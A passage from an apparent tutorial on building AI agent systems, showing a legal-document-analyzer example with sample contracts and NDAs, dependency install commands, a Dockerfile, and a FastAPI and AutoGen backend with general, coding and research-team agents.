1122 8.2 Client Indemnification. Client shall defend, indemnify, and hold harmless Provider from and against any claim, demand, suit, or proceeding made or brought against Provider by a third party arising out of Client's use of the Services or Work Product in violation of this Agreement or applicable law.
1123
1124 9. GENERAL
1125
1126 9.1 Independent Contractors. The parties are independent contractors. This Agreement does not create a partnership, franchise, joint venture, agency, fiduciary, or employment relationship between the parties.
1127
1128 9.2 Notices. All notices under this Agreement shall be in writing and shall be deemed given when delivered personally, by email (with confirmation of receipt), or by certified mail (return receipt requested) to the address specified below or such other address as may be specified in writing.
1129
1130 9.3 Assignment. Neither party may assign this Agreement without the prior written consent of the other party; provided, however, that either party may assign this Agreement to a successor in the event of a merger, acquisition, or sale of all or substantially all of its assets.
1131
1132 9.4 Governing Law. This Agreement shall be governed by the laws of the State of California without regard to its conflict of laws provisions.
1133
1134 9.5 Dispute Resolution. Any dispute arising out of or relating to this Agreement shall be resolved by binding arbitration in San Francisco, California, in accordance with the Commercial Arbitration Rules of the American Arbitration Association.
1135
1136 9.6 Entire Agreement. This Agreement constitutes the entire agreement between the parties regarding the subject matter hereof and supersedes all prior or contemporaneous agreements, understandings, and communication, whether written or oral.
1137
1138 9.7 Severability. If any provision of this Agreement is held to be unenforceable or invalid, such provision shall be changed and interpreted to accomplish the objectives of such provision to the greatest extent possible under applicable law, and the remaining provisions shall continue in full force and effect.
1139
1140 9.8 Waiver. No waiver of any provision of this Agreement shall be effective unless in writing and signed by the party against whom the waiver is sought to be enforced. No failure or delay by either party in exercising any right under this Agreement shall constitute a waiver of that right.
1141
1142 9.9 Force Majeure. Neither party shall be liable for any failure or delay in performance under this Agreement due to causes beyond its reasonable control, including acts of God, natural disasters, terrorism, riots, or war.
1143
1144 9.10 Survival. The provisions of Sections 4, 5, 6.2, 7, 8, and 9 shall survive the termination or expiration of this Agreement.
1145
1146 IN WITNESS WHEREOF, the parties have executed this Agreement as of the Effective Date.
1147
1148 ABC TECHNOLOGY SOLUTIONS, INC.
1149
1150 By: ______________________________
1151 Name: John Smith
1152 Title: Chief Executive Officer
1153
1154 XYZ CORPORATION
1155
1156 By: ______________________________
1157 Name: Jane Doe
1158 Title: Chief Technology Officer
1159 """
1160
1161 # Analyze the document
1162 analysis = legal_analyzer.analyze_document(
1163 document_text=example_contract,
1164 document_type="Service Agreement",
1165 industry="Technology"
1166 )
1167
1168 print("=== Document Analysis ===")
1169 print(f"Analysis ID: {analysis['analysis_id']}")
1170 print(f"Document Type: {analysis['document_type']}")
1171
1172 # Print structure overview
1173 structure = analysis.get("structure", {})
1174 print("\nDocument Structure:")
1175 print(f"Type: {structure.get('document_type', 'Unknown')}")
1176 print(f"Jurisdiction: {structure.get('jurisdiction', 'Unknown')}")
1177 print(f"Date: {structure.get('date', 'Unknown')}")
1178 print(f"Parties: {', '.join(str(p) for p in structure.get('parties', []))}")
1179
1180 # Print key legal issues
1181 issues = analysis.get("legal_issues", {}).get("issues", [])
1182 print("\nKey Legal Issues:")
1183 for issue in issues[:3]: # Print top 3 issues
1184 print(f"- {issue.get('description', 'Unknown issue')} (Severity: {issue.get('severity', 'Unknown')})")
1185
1186 # Print compliance assessment
1187 compliance = analysis.get("compliance_assessment", {})
1188 print(f"\nCompliance Score: {compliance.get('compliance_score', 'N/A')}")
1189
1190 # Print relevant case law
1191 case_law = analysis.get("relevant_case_law", [])
1192 print("\nRelevant Case Law:")
1193 for case in case_law[:2]: # Print top 2 cases
1194 print(f"- {case.get('case_name', 'Unknown case')} ({case.get('citation', 'No citation')})")
1195
1196 # Print executive summary
1197 summary = analysis.get("summary", {})
1198 exec_summary = summary.get("executive_summary", "No summary available")
1199 print("\nExecutive Summary:")
1200 print(exec_summary[:500] + "..." if len(exec_summary) > 500 else exec_summary)

Usage Example:

python
1from legal_document_analyzer import LegalDocumentAnalyzer
2
3# Initialize the analyzer
4legal_analyzer = LegalDocumentAnalyzer()
5
6# Sample NDA document
7nda_document = """
8MUTUAL NON-DISCLOSURE AGREEMENT
9
10This Mutual Non-Disclosure Agreement (this "Agreement") is made effective as of May 10, 2023 (the "Effective Date") by and between Alpha Innovations, LLC, a Delaware limited liability company with its principal place of business at 567 Innovation Way, Boston, MA 02110 ("Company A"), and Beta Technologies Inc., a California corporation with its principal place of business at 890 Tech Boulevard, San Jose, CA 95110 ("Company B").
11
121. PURPOSE
13The parties wish to explore a potential business relationship in connection with a joint development project (the "Purpose"). This Agreement is intended to allow the parties to continue to discuss and evaluate the Purpose while protecting the parties' Confidential Information (as defined below) against unauthorized use or disclosure.
14
152. DEFINITION OF CONFIDENTIAL INFORMATION
16"Confidential Information" means any information disclosed by either party ("Disclosing Party") to the other party ("Receiving Party"), either directly or indirectly, in writing, orally or by inspection of tangible objects, which is designated as "Confidential," "Proprietary" or some similar designation, or that should reasonably be understood to be confidential given the nature of the information and the circumstances of disclosure. Confidential Information includes, without limitation, technical data, trade secrets, know-how, research, product plans, products, services, customer lists, markets, software, developments, inventions, processes, formulas, technology, designs, drawings, engineering, hardware configuration information, marketing, financial or other business information. Confidential Information shall not include any information that (i) was publicly known prior to the time of disclosure; (ii) becomes publicly known after disclosure through no action or inaction of the Receiving Party; (iii) is already in the possession of the Receiving Party at the time of disclosure; (iv) is obtained by the Receiving Party from a third party without a breach of such third party's obligations of confidentiality; or (v) is independently developed by the Receiving Party without use of or reference to the Disclosing Party's Confidential Information.
17
183. NON-USE AND NON-DISCLOSURE
19The Receiving Party shall not use any Confidential Information of the Disclosing Party for any purpose except to evaluate and engage in discussions concerning the Purpose. The Receiving Party shall not disclose any Confidential Information of the Disclosing Party to third parties or to the Receiving Party's employees, except to those employees who are required to have the information in order to evaluate or engage in discussions concerning the Purpose and who have signed confidentiality agreements with the Receiving Party with terms no less restrictive than those herein.
20
214. MAINTENANCE OF CONFIDENTIALITY
22The Receiving Party shall take reasonable measures to protect the secrecy of and avoid disclosure and unauthorized use of the Confidential Information of the Disclosing Party. Without limiting the foregoing, the Receiving Party shall take at least those measures that it takes to protect its own most highly confidential information and shall promptly notify the Disclosing Party of any unauthorized use or disclosure of Confidential Information of which it becomes aware. The Receiving Party shall reproduce the Disclosing Party's proprietary rights notices on any copies of Confidential Information, in the same manner in which such notices were set forth in or on the original.
23
245. RETURN OF MATERIALS
25All documents and other tangible objects containing or representing Confidential Information that have been disclosed by either party to the other party, and all copies thereof which are in the possession of the other party, shall be and remain the property of the Disclosing Party and shall be promptly returned to the Disclosing Party or destroyed upon the Disclosing Party's written request.
26
276. NO LICENSE
28Nothing in this Agreement is intended to grant any rights to either party under any patent, copyright, trade secret or other intellectual property right of the other party, nor shall this Agreement grant any party any rights in or to the Confidential Information of the other party except as expressly set forth herein.
29
307. TERM AND TERMINATION
31This Agreement shall remain in effect for a period of three (3) years from the Effective Date. Notwithstanding the foregoing, the Receiving Party's obligations with respect to the Confidential Information of the Disclosing Party shall survive for a period of five (5) years from the date of disclosure.
32
338. REMEDIES
34The Receiving Party acknowledges that unauthorized disclosure of the Disclosing Party's Confidential Information could cause substantial harm to the Disclosing Party for which damages alone might not be a sufficient remedy. Accordingly, in addition to all other remedies, the Disclosing Party shall be entitled to seek specific performance and injunctive or other equitable relief as a remedy for any breach or threatened breach of this Agreement.
35
369. MISCELLANEOUS
37This Agreement shall bind and inure to the benefit of the parties hereto and their successors and assigns. This Agreement shall be governed by the laws of the State of New York, without reference to conflict of laws principles. This Agreement contains the entire agreement between the parties with respect to the subject matter hereof, and neither party shall have any obligation, express or implied by law, with respect to trade secret or proprietary information of the other party except as set forth herein. Any failure to enforce any provision of this Agreement shall not constitute a waiver thereof or of any other provision. This Agreement may not be amended, nor any obligation waived, except by a writing signed by both parties hereto.
38
39IN WITNESS WHEREOF, the parties have executed this Agreement as of the Effective Date.
40
41ALPHA INNOVATIONS, LLC
42
43By: _________________________
44Name: Robert Johnson
45Title: Chief Executive Officer
46
47BETA TECHNOLOGIES INC.
48
49By: _________________________
50Name: Sarah Williams
51Title: President
52"""
53
54# Analyze the NDA document
55analysis_result = legal_analyzer.analyze_document(
56 document_text=nda_document,
57 document_type="Non-Disclosure Agreement",
58 jurisdiction="United States",
59 industry="Technology"
60)
61
62# Print key findings
63print("=== NDA DOCUMENT ANALYSIS ===")
64print(f"Analysis ID: {analysis_result['analysis_id']}")
65print(f"Document Type: {analysis_result['document_type']}")
66print(f"Jurisdiction: {analysis_result['jurisdiction']}")
67
68# Print document structure
69structure = analysis_result.get("structure", {})
70print("\nDOCUMENT STRUCTURE:")
71print(f"Parties: {', '.join(str(p) for p in structure.get('parties', []))}")
72print(f"Effective Date: {structure.get('date', 'Unknown')}")
73print(f"Term: {structure.get('term', 'Unknown')}")
74
75# Print key obligations
76obligations = analysis_result.get("rights_obligations", {}).get("obligations", [])
77print("\nKEY OBLIGATIONS:")
78for obligation in obligations[:3]: # Print top 3 obligations
79 print(f"- {obligation.get('text', 'Unknown')}")
80 print(f" Subject: {obligation.get('subject', 'Unknown')}")
81
82# Print legal issues
83issues = analysis_result.get("legal_issues", {}).get("issues", [])
84print("\nLEGAL ISSUES AND RISKS:")
85for issue in issues[:3]: # Print top 3 issues
86 print(f"- {issue.get('description', 'Unknown issue')}")
87 print(f" Severity: {issue.get('severity', 'Unknown')}")
88 print(f" Recommendation: {issue.get('recommended_remediation', 'N/A')}")
89
90# Print compliance assessment
91compliance = analysis_result.get("compliance_assessment", {})
92print("\nCOMPLIANCE ASSESSMENT:")
93print(f"Overall Compliance Score: {compliance.get('compliance_score', 'N/A')}")
94
95# Print excerpt from detailed summary
96summary = analysis_result.get("summary", {}).get("detailed_summary", "No summary available")
97print("\nANALYSIS SUMMARY:")
98summary_excerpt = summary[:500] + "..." if len(summary) > 500 else summary
99print(summary_excerpt)
100
101# Compare with another NDA (simplified example)
102other_nda = """
103CONFIDENTIALITY AGREEMENT
104
105This Confidentiality Agreement (this "Agreement") is made as of June 1, 2023 by and between Acme Corp., a Nevada corporation ("Company A") and XYZ Enterprises, a Delaware LLC ("Company B").
106
1071. CONFIDENTIAL INFORMATION
108"Confidential Information" means all non-public information that Company A designates as being confidential or which under the circumstances surrounding disclosure ought to be treated as confidential by Company B. "Confidential Information" includes, without limitation, information relating to released or unreleased Company A software or hardware products, marketing or promotion of any Company A product, business policies or practices, and information received from others that Company A is obligated to treat as confidential.
109
1102. EXCLUSIONS
111"Confidential Information" excludes information that: (i) is or becomes generally known through no fault of Company B; (ii) was known to Company B prior to disclosure; (iii) is rightfully obtained by Company B from a third party without restriction; or (iv) is independently developed by Company B without use of Confidential Information.
112
1133. OBLIGATIONS
114Company B shall hold Company A's Confidential Information in strict confidence and shall not disclose such Confidential Information to any third party. Company B shall take reasonable security precautions, at least as great as the precautions it takes to protect its own confidential information.
115
1164. TERM
117This Agreement shall remain in effect for 2 years from the date hereof.
118
1195. GOVERNING LAW
120This Agreement shall be governed by the laws of the State of California.
121
122IN WITNESS WHEREOF, the parties hereto have executed this Agreement.
123
124ACME CORP.
125By: ________________________
126
127XYZ ENTERPRISES
128By: ________________________
129"""
130
131# Compare the two NDAs
132comparison = legal_analyzer.compare_documents(
133 document1_text=nda_document,
134 document2_text=other_nda,
135 comparison_type="clause"
136)
137
138# Print comparison highlights
139print("\n=== NDA COMPARISON ===")
140print("\nKEY DIFFERENCES:")
141differences = comparison.get("key_differences", [])
142for diff in differences[:3]: # Print top 3 differences
143 print(f"- {diff}")
144
145print("\nRECOMMENDATIONS:")
146recommendations = comparison.get("recommendations", [])
147for rec in recommendations[:2]: # Print top 2 recommendations
148 print(f"- {rec}")

This Legal Document Analyzer agent template demonstrates key legal tech patterns:

  1. Document Structure Analysis: Extracts hierarchical structure and key provisions from legal documents
  2. Legal Research Integration: Finds relevant case law and precedents
  3. Compliance Assessment: Identifies regulatory requirements and compliance issues
  4. Issue Spotting: Detects potential legal risks and ambiguities
  5. Document Comparison: Compares legal documents and identifies material differences
  6. Citation Verification: Validates and verifies legal citations

5. Implementation Guide: Setting Up Your AI Agent System

Installing the Required Dependencies

To build a large-scale AI agent system, you'll need to set up the core dependencies that power your agent infrastructure. The following installation guide covers the essential components for each of our tech stack configurations.

Base Requirements (All Configurations)

bash
1# Create and activate a virtual environment
2python -m venv agent_env
3source agent_env/bin/activate # On Windows: agent_env\Scripts\activate
4
5# Install base dependencies
6pip install -U pip setuptools wheel
7pip install -U openai autogen-agentchat langchain langchain-community
8pip install -U numpy pandas matplotlib seaborn
9pip install -U pydantic python-dotenv

Kubernetes + Ray Serve + AutoGen + LangChain

For distributed AI workloads with horizontal scaling capabilities:

bash
1# Install Ray and Kubernetes dependencies
2pip install -U ray[serve,tune,data,default]
3pip install -U kubernetes
4pip install -U fastapi uvicorn
5pip install -U mlflow optuna
6
7# Install AutoGen with integrations
8pip install -U pyautogen[retrievers,graph]
9
10# Install monitoring tools
11pip install -U prometheus-client grafana-api

Apache Kafka + FastAPI + AutoGen + ChromaDB

For real-time AI pipelines with event-driven architecture:

bash
1# Install Kafka and API dependencies
2pip install -U confluent-kafka aiokafka
3pip install -U fastapi uvicorn
4pip install -U redis httpx
5
6# Install vector database
7pip install -U chromadb langchain-chroma
8
9# Install monitoring and observability
10pip install -U opentelemetry-api opentelemetry-sdk
11pip install -U opentelemetry-exporter-otlp

Django/Flask + Celery + AutoGen + Pinecone

For task orchestration and asynchronous processing:

bash
1# Install web framework and task queue
2pip install -U django djangorestframework django-cors-headers
3# Or for Flask-based setup:
4# pip install -U flask flask-restful flask-cors
5
6pip install -U celery redis flower
7
8# Install vector database
9pip install -U pinecone-client langchain-pinecone
10
11# Install schema validation and background tools
12pip install -U marshmallow pydantic
13pip install -U gunicorn psycopg2-binary

Airflow + AutoGen + OpenAI Functions + Snowflake

For enterprise AI automation and data pipeline orchestration:

bash
1# Install Airflow with recommended extras
2pip install -U apache-airflow[crypto,celery,postgres,redis,ssh]
3
4# Install database connectors
5pip install -U snowflake-connector-python
6pip install -U snowflake-sqlalchemy
7pip install -U snowflake-ml-python
8
9# Install experiment tracking
10pip install -U mlflow boto3

Docker Environment Setup

For containerized deployment, create a Dockerfile for your agent service:

dockerfile
1FROM python:3.10-slim
2
3WORKDIR /app
4
5# Install system dependencies
6RUN apt-get update && apt-get install -y \
7 build-essential \
8 curl \
9 software-properties-common \
10 git \
11 && rm -rf /var/lib/apt/lists/*
12
13# Copy requirements file
14COPY requirements.txt .
15
16# Install Python dependencies
17RUN pip install --no-cache-dir --upgrade pip && \
18 pip install --no-cache-dir -r requirements.txt
19
20# Copy application code
21COPY . .
22
23# Expose the port your application runs on
24EXPOSE 8000
25
26# Set environment variables
27ENV PYTHONUNBUFFERED=1
28
29# Run the application
30CMD ["uvicorn", "main:app", "--host", "0.0.0.0", "--port", "8000"]

Structuring the Backend with FastAPI or Django

When building a large-scale AI agent system, the backend structure is crucial for maintainability, scalability, and performance. Let's explore both FastAPI and Django approaches:

FastAPI Backend for AI Agents

FastAPI is ideal for high-performance, asynchronous API services that need to handle many concurrent agent interactions.

python
1# main.py - Entry point for FastAPI application
2import os
3import json
4import logging
5from typing import Dict, List, Any, Optional
6
7import uvicorn
8from fastapi import FastAPI, Depends, HTTPException, BackgroundTasks
9from fastapi.middleware.cors import CORSMiddleware
10from pydantic import BaseModel
11
12from agent_system.core import AgentOrchestrator
13from agent_system.models import AgentRequest, AgentResponse
14from agent_system.auth import get_api_key, get_current_user
15from agent_system.config import Settings
16
17# Initialize settings and logging
18settings = Settings()
19logging.basicConfig(
20 level=settings.log_level,
21 format="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
22)
23logger = logging.getLogger("agent_api")
24
25# Initialize FastAPI app
26app = FastAPI(
27 title="AI Agent System API",
28 description="API for interacting with an AI agent system",
29 version="1.0.0",
30)
31
32# Add CORS middleware
33app.add_middleware(
34 CORSMiddleware,
35 allow_origins=settings.cors_origins,
36 allow_credentials=True,
37 allow_methods=["*"],
38 allow_headers=["*"],
39)
40
41# Initialize agent orchestrator
42agent_orchestrator = AgentOrchestrator(settings=settings)
43
44# API routes
45
46@app.post("/api/v1/agents/execute", response_model=AgentResponse)
47async def execute_agent(
48 request: AgentRequest,
49 background_tasks: BackgroundTasks,
50 api_key: str = Depends(get_api_key),
51):
52 """Execute an agent with the given parameters."""
53 logger.info(f"Received request for agent: {request.agent_type}")
54
55 try:
56 # For long-running tasks, process in background
57 if request.async_execution:
58 task_id = agent_orchestrator.generate_task_id()
59 background_tasks.add_task(
60 agent_orchestrator.execute_agent_task,
61 task_id=task_id,
62 agent_type=request.agent_type,
63 parameters=request.parameters,
64 user_id=request.user_id,
65 )
66 return AgentResponse(
67 status="processing",
68 task_id=task_id,
69 message="Agent task started, check status at /api/v1/tasks/{task_id}",
70 )
71
72 # For synchronous execution
73 result = await agent_orchestrator.execute_agent(
74 agent_type=request.agent_type,
75 parameters=request.parameters,
76 user_id=request.user_id,
77 )
78
79 return AgentResponse(
80 status="completed",
81 result=result,
82 message="Agent execution complete",
83 )
84
85 except Exception as e:
86 logger.error(f"Error executing agent: {str(e)}", exc_info=True)
87 raise HTTPException(status_code=500, detail=f"Agent execution failed: {str(e)}")
88
89@app.get("/api/v1/tasks/{task_id}", response_model=AgentResponse)
90async def get_task_status(
91 task_id: str,
92 api_key: str = Depends(get_api_key),
93):
94 """Get the status of an agent task."""
95 try:
96 task_status = agent_orchestrator.get_task_status(task_id)
97
98 if not task_status:
99 raise HTTPException(status_code=404, detail=f"Task {task_id} not found")
100
101 return task_status
102
103 except HTTPException:
104 raise
105 except Exception as e:
106 logger.error(f"Error retrieving task status: {str(e)}", exc_info=True)
107 raise HTTPException(status_code=500, detail=f"Error retrieving task status: {str(e)}")
108
109@app.get("/api/v1/agents/types")
110async def get_agent_types(
111 api_key: str = Depends(get_api_key),
112):
113 """Get available agent types and capabilities."""
114 return {
115 "agent_types": agent_orchestrator.get_available_agent_types(),
116 }
117
118# Health check endpoint
119@app.get("/health")
120async def health_check():
121 """Health check endpoint."""
122 return {"status": "healthy"}
123
124if __name__ == "__main__":
125 uvicorn.run("main:app", host="0.0.0.0", port=8000, reload=settings.debug)

Agent System Core Structure (FastAPI)

python
1# agent_system/core.py
2import os
3import json
4import uuid
5import time
6import asyncio
7import logging
8from typing import Dict, List, Any, Optional
9
10import autogen
11from autogen.agentchat.contrib.gpt_assistant_agent import GPTAssistantAgent
12
13from .config import Settings
14from .models import AgentTask, AgentResponse
15
16logger = logging.getLogger("agent_orchestrator")
17
18class AgentOrchestrator:
19 """Orchestrates AI agents, managing their lifecycle and execution."""
20
21 def __init__(self, settings: Settings):
22 """Initialize the agent orchestrator with configuration settings."""
23 self.settings = settings
24 self.agent_registry = {} # Maps agent_type to agent factory function
25 self.agent_configs = {} # Maps agent_type to configuration
26 self.tasks = {} # Maps task_id to task status/results
27
28 # Initialize the agent registry
29 self._initialize_agent_registry()
30
31 def _initialize_agent_registry(self):
32 """Register available agent types with their factory functions."""
33 # Register default agent types
34 self.register_agent_type(
35 "general_assistant",
36 self._create_general_assistant,
37 {
38 "description": "General-purpose assistant for wide-ranging questions",
39 "parameters": {
40 "temperature": 0.7,
41 "streaming": True
42 }
43 }
44 )
45
46 self.register_agent_type(
47 "code_assistant",
48 self._create_code_assistant,
49 {
50 "description": "Specialized assistant for coding and software development",
51 "parameters": {
52 "temperature": 0.2,
53 "streaming": True
54 }
55 }
56 )
57
58 self.register_agent_type(
59 "research_team",
60 self._create_research_team,
61 {
62 "description": "Multi-agent team for in-depth research on complex topics",
63 "parameters": {
64 "max_research_steps": 10,
65 "depth": "comprehensive",
66 "team_size": 3
67 }
68 }
69 )
70
71 # Load custom agent types from configuration if available
72 self._load_custom_agent_types()
73
74 def _load_custom_agent_types(self):
75 """Load custom agent types from configuration."""
76 custom_agents_path = self.settings.custom_agents_path
77 if not custom_agents_path or not os.path.exists(custom_agents_path):
78 logger.info("No custom agents configuration found")
79 return
80
81 try:
82 with open(custom_agents_path, "r") as f:
83 custom_agents = json.load(f)
84
85 for agent_type, config in custom_agents.items():
86 # Custom agents would need a factory method that interprets the config
87 self.register_agent_type(
88 agent_type,
89 self._create_custom_agent,
90 config
91 )
92
93 logger.info(f"Loaded {len(custom_agents)} custom agent types")
94 except Exception as e:
95 logger.error(f"Error loading custom agents: {str(e)}", exc_info=True)
96
97 def register_agent_type(self, agent_type: str, factory_func: callable, config: Dict[str, Any]):
98 """Register a new agent type with its factory function and configuration."""
99 self.agent_registry[agent_type] = factory_func
100 self.agent_configs[agent_type] = config
101 logger.info(f"Registered agent type: {agent_type}")
102
103 def get_available_agent_types(self) -> List[Dict[str, Any]]:
104 """Get a list of available agent types and their configurations."""
105 return [
106 {"agent_type": agent_type, **config}
107 for agent_type, config in self.agent_configs.items()
108 ]
109
110 def generate_task_id(self) -> str:
111 """Generate a unique task ID."""
112 return f"task_{uuid.uuid4().hex}"
113
114 async def execute_agent(
115 self,
116 agent_type: str,
117 parameters: Dict[str, Any],
118 user_id: Optional[str] = None,
119 ) -> Dict[str, Any]:
120 """Execute an agent synchronously and return the result."""
121 if agent_type not in self.agent_registry:
122 raise ValueError(f"Unknown agent type: {agent_type}")
123
124 # Create agent instance
125 agent_factory = self.agent_registry[agent_type]
126 agent = agent_factory(parameters)
127
128 # Execute agent
129 try:
130 result = await agent.execute(parameters)
131 return result
132 except Exception as e:
133 logger.error(f"Error executing agent {agent_type}: {str(e)}", exc_info=True)
134 raise
135
136 async def execute_agent_task(
137 self,
138 task_id: str,
139 agent_type: str,
140 parameters: Dict[str, Any],
141 user_id: Optional[str] = None,
142 ):
143 """Execute an agent as a background task and store the result."""
144 # Initialize task status
145 self.tasks[task_id] = AgentTask(
146 task_id=task_id,
147 agent_type=agent_type,
148 status="processing",
149 start_time=time.time(),
150 parameters=parameters,
151 user_id=user_id,
152 )
153
154 try:
155 # Execute the agent
156 result = await self.execute_agent(agent_type, parameters, user_id)
157
158 # Update task with successful result
159 self.tasks[task_id].status = "completed"
160 self.tasks[task_id].end_time = time.time()
161 self.tasks[task_id].result = result
162
163 except Exception as e:
164 # Update task with error
165 self.tasks[task_id].status = "failed"
166 self.tasks[task_id].end_time = time.time()
167 self.tasks[task_id].error = str(e)
168 logger.error(f"Task {task_id} failed: {str(e)}", exc_info=True)
169
170 def get_task_status(self, task_id: str) -> Optional[AgentResponse]:
171 """Get the status of a task by ID."""
172 if task_id not in self.tasks:
173 return None
174
175 task = self.tasks[task_id]
176
177 if task.status == "completed":
178 return AgentResponse(
179 status="completed",
180 task_id=task_id,
181 result=task.result,
182 message="Task completed successfully",
183 execution_time=task.end_time - task.start_time if task.end_time else None,
184 )
185 elif task.status == "failed":
186 return AgentResponse(
187 status="failed",
188 task_id=task_id,
189 error=task.error,
190 message="Task execution failed",
191 execution_time=task.end_time - task.start_time if task.end_time else None,
192 )
193 else:
194 return AgentResponse(
195 status="processing",
196 task_id=task_id,
197 message="Task is still processing",
198 execution_time=time.time() - task.start_time if task.start_time else None,
199 )
200
201 # Agent factory methods
202
203 def _create_general_assistant(self, parameters: Dict[str, Any]):
204 """Create a general-purpose assistant agent."""
205 temperature = parameters.get("temperature", 0.7)
206
207 return GeneralAssistantAgent(
208 name="GeneralAssistant",
209 llm_config={
210 "config_list": self.settings.get_llm_config_list(),
211 "temperature": temperature,
212 }
213 )
214
215 def _create_code_assistant(self, parameters: Dict[str, Any]):
216 """Create a code-specialized assistant agent."""
217 temperature = parameters.get("temperature", 0.2)
218
219 return CodeAssistantAgent(
220 name="CodeAssistant",
221 llm_config={
222 "config_list": self.settings.get_llm_config_list(),
223 "temperature": temperature,
224 }
225 )
226
227 def _create_research_team(self, parameters: Dict[str, Any]):
228 """Create a multi-agent research team."""
229 return ResearchTeamAgentGroup(
230 config_list=self.settings.get_llm_config_list(),
231 parameters=parameters
232 )
233
234 def _create_custom_agent(self, parameters: Dict[str, Any]):
235 """Create a custom agent based on configuration."""
236 # Implementation would depend on how custom agents are defined
237 agent_config = parameters.get("agent_config", {})
238
239 if agent_config.get("type") == "assistant":
240 return GeneralAssistantAgent(
241 name=agent_config.get("name", "CustomAssistant"),
242 llm_config={
243 "config_list": self.settings.get_llm_config_list(),
244 "temperature": agent_config.get("temperature", 0.7),
245 }
246 )
247 elif agent_config.get("type") == "multi_agent":
248 # Create a multi-agent system
249 return CustomMultiAgentSystem(
250 config_list=self.settings.get_llm_config_list(),
251 parameters=agent_config
252 )
253 else:
254 raise ValueError(f"Unknown custom agent type: {agent_config.get('type')}")
255
256
257# Example agent implementations
258
259class GeneralAssistantAgent:
260 """General-purpose assistant agent implementation."""
261
262 def __init__(self, name: str, llm_config: Dict[str, Any]):
263 self.name = name
264 self.llm_config = llm_config
265 self.agent = autogen.AssistantAgent(
266 name=name,
267 system_message="You are a helpful AI assistant that provides informative, accurate, and thoughtful responses.",
268 llm_config=llm_config
269 )
270
271 async def execute(self, parameters: Dict[str, Any]) -> Dict[str, Any]:
272 """Execute the agent with the given parameters."""
273 user_message = parameters.get("message", "")
274 if not user_message:
275 raise ValueError("No message provided for the agent")
276
277 user_proxy = autogen.UserProxyAgent(
278 name="user_proxy",
279 human_input_mode="NEVER",
280 max_consecutive_auto_reply=0,
281 )
282
283 # Start the conversation
284 user_proxy.initiate_chat(
285 self.agent,
286 message=user_message
287 )
288
289 # Extract the response
290 last_message = None
291 for message in reversed(user_proxy.chat_history):
292 if message["role"] == "assistant":
293 last_message = message
294 break
295
296 if not last_message:
297 raise RuntimeError("No response received from agent")
298
299 return {
300 "response": last_message["content"],
301 "agent_name": self.name,
302 "chat_history": user_proxy.chat_history
303 }
304
305
306class CodeAssistantAgent:
307 """Code-specialized assistant agent implementation."""
308
309 def __init__(self, name: str, llm_config: Dict[str, Any]):
310 self.name = name
311 self.llm_config = llm_config
312 self.agent = autogen.AssistantAgent(
313 name=name,
314 system_message="""You are a skilled coding assistant with expertise in software development.
315 You provide accurate, efficient, and well-explained code solutions.
316 When writing code, focus on best practices, performance, and readability.
317 Explain your code so users understand the implementation.""",
318 llm_config=llm_config
319 )
320
321 async def execute(self, parameters: Dict[str, Any]) -> Dict[str, Any]:
322 """Execute the agent with the given parameters."""
323 user_message = parameters.get("message", "")
324 if not user_message:
325 raise ValueError("No message provided for the agent")
326
327 # Allow code execution if specifically enabled
328 code_execution = parameters.get("code_execution", False)
329
330 user_proxy = autogen.UserProxyAgent(
331 name="user_proxy",
332 human_input_mode="NEVER",
333 max_consecutive_auto_reply=0,
334 code_execution_config={"work_dir": "coding_workspace"} if code_execution else None
335 )
336
337 # Start the conversation
338 user_proxy.initiate_chat(
339 self.agent,
340 message=user_message
341 )
342
343 # Extract the response
344 last_message = None
345 for message in reversed(user_proxy.chat_history):
346 if message["role"] == "assistant":
347 last_message = message
348 break
349
350 if not last_message:
351 raise RuntimeError("No response received from agent")
352
353 return {
354 "response": last_message["content"],
355 "agent_name": self.name,
356 "chat_history": user_proxy.chat_history,
357 "code_blocks": self._extract_code_blocks(last_message["content"])
358 }
359
360 def _extract_code_blocks(self, text: str) -> List[Dict[str, str]]:
361 """Extract code blocks from a markdown text."""
362 import re
363
364 code_blocks = []
365 pattern = r'```(\w*)\n(.*?)```'
366 matches = re.findall(pattern, text, re.DOTALL)
367
368 for language, code in matches:
369 code_blocks.append({
370 "language": language.strip() or "plaintext",
371 "code": code.strip()
372 })
373
374 return code_blocks
375
376
377class ResearchTeamAgentGroup:
378 """Multi-agent research team implementation."""
379
380 def __init__(self, config_list: List[Dict[str, Any]], parameters: Dict[str, Any]):
381 self.config_list = config_list
382 self.parameters = parameters
383
384 # Configure the team size and roles
385 self.team_size = parameters.get("team_size", 3)
386
387 # Initialize base LLM config
388 self.base_llm_config = {
389 "config_list": config_list,
390 "temperature": 0.5,
391 }
392
393 async def execute(self, parameters: Dict[str, Any]) -> Dict[str, Any]:
394 """Execute the research team with the given parameters."""
395 topic = parameters.get("topic", "")
396 if not topic:
397 raise ValueError("No research topic provided")
398
399 depth = parameters.get("depth", "comprehensive")
400 max_steps = parameters.get("max_research_steps", 10)
401
402 # Create the research team
403 researcher = autogen.AssistantAgent(
404 name="Researcher",
405 system_message="""You are an expert researcher who excels at finding information
406 and breaking down complex topics. Your role is to gather relevant information,
407 identify key questions, and organize research findings.""",
408 llm_config=self.base_llm_config
409 )
410
411 analyst = autogen.AssistantAgent(
412 name="Analyst",
413 system_message="""You are an expert analyst who excels at interpreting information,
414 identifying patterns, and drawing insightful conclusions. Your role is to analyze
415 the research findings, evaluate evidence, and provide reasoned interpretations.""",
416 llm_config=self.base_llm_config
417 )
418
419 critic = autogen.AssistantAgent(
420 name="Critic",
421 system_message="""You are an expert critic who excels at identifying weaknesses,
422 biases, and gaps in research and analysis. Your role is to critique the research
423 and analysis, point out limitations, and suggest improvements.""",
424 llm_config=self.base_llm_config
425 )
426
427 # Create user proxy to coordinate the team
428 user_proxy = autogen.UserProxyAgent(
429 name="ResearchCoordinator",
430 human_input_mode="NEVER",
431 max_consecutive_auto_reply=max_steps,
432 system_message="""You are coordinating a research project.
433 Your role is to guide the research team, track progress, and
434 ensure the final output addresses the research topic completely."""
435 )
436
437 # Create group chat for the team
438 groupchat = autogen.GroupChat(
439 agents=[user_proxy, researcher, analyst, critic],
440 messages=[],
441 max_round=max_steps
442 )
443
444 manager = autogen.GroupChatManager(
445 groupchat=groupchat,
446 llm_config=self.base_llm_config
447 )
448
449 # Start the research process
450 research_prompt = f"""
451 Research Topic: {topic}
452
453 Research Depth: {depth}
454
455 Please conduct a thorough research project on this topic following these steps:
456
457 1. The Researcher should first explore the topic, identify key questions, and gather relevant information.
458 2. The Analyst should then interpret the findings, identify patterns, and draw conclusions.
459 3. The Critic should evaluate the research and analysis, identify limitations, and suggest improvements.
460 4. Iterate on this process until a comprehensive understanding is achieved.
